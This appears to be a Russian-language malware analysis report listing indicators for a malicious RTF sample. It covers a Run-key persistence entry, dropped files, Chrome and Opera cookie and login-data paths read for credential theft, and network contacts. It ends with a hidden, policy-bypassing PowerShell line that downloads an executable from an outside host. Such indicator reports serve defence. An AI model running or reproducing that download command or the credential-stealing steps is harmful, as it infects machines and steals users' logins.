Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'macaddress' = 'C:\InstallC113\macaddress.exe'
- https://ninjaclip2022.000webhostapp.com/vysor.zip как %appdata%\vysor.exe
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
- %APPDATA%\opera software\opera stable\login data
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %TEMP%\abctfhghgdghgh‹.sct
- %APPDATA%\vysor.exe
- C:\installc113\macaddress.exe
- <Текущая директория>\~wrd0000.tmp
- C:\installc113\sqlite.interop.dll
- C:\installc113\newtonsoft.json.dll
- %TEMP%\runtime.msil.1.0.0.0\nativepro.dll
- %TEMP%\tmp14f6.tmp
- %TEMP%\tmp15e1.tmp
- %TEMP%\tmp16fb.tmp
- %TEMP%\abctfhghgdghgh‹.sct
- %TEMP%\tmp14f6.tmp
- %TEMP%\tmp15e1.tmp
- %TEMP%\tmp16fb.tmp
- <PATH_SAMPLE>.rtf
- 'ni#######2022.000webhostapp.com':443
- 'lu##est.com':80
- http://lu##est.com/myip.json
- DNS ASK ni#######2022.000webhostapp.com
- DNS ASK lu##est.com
- '%APPDATA%\vysor.exe'
- 'C:\installc113\macaddress.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://ninjaclip2022.000webhostapp.com/Vysor.zip','%APPDATA%\Vysor.exe');Sta...' (со скрытым окном)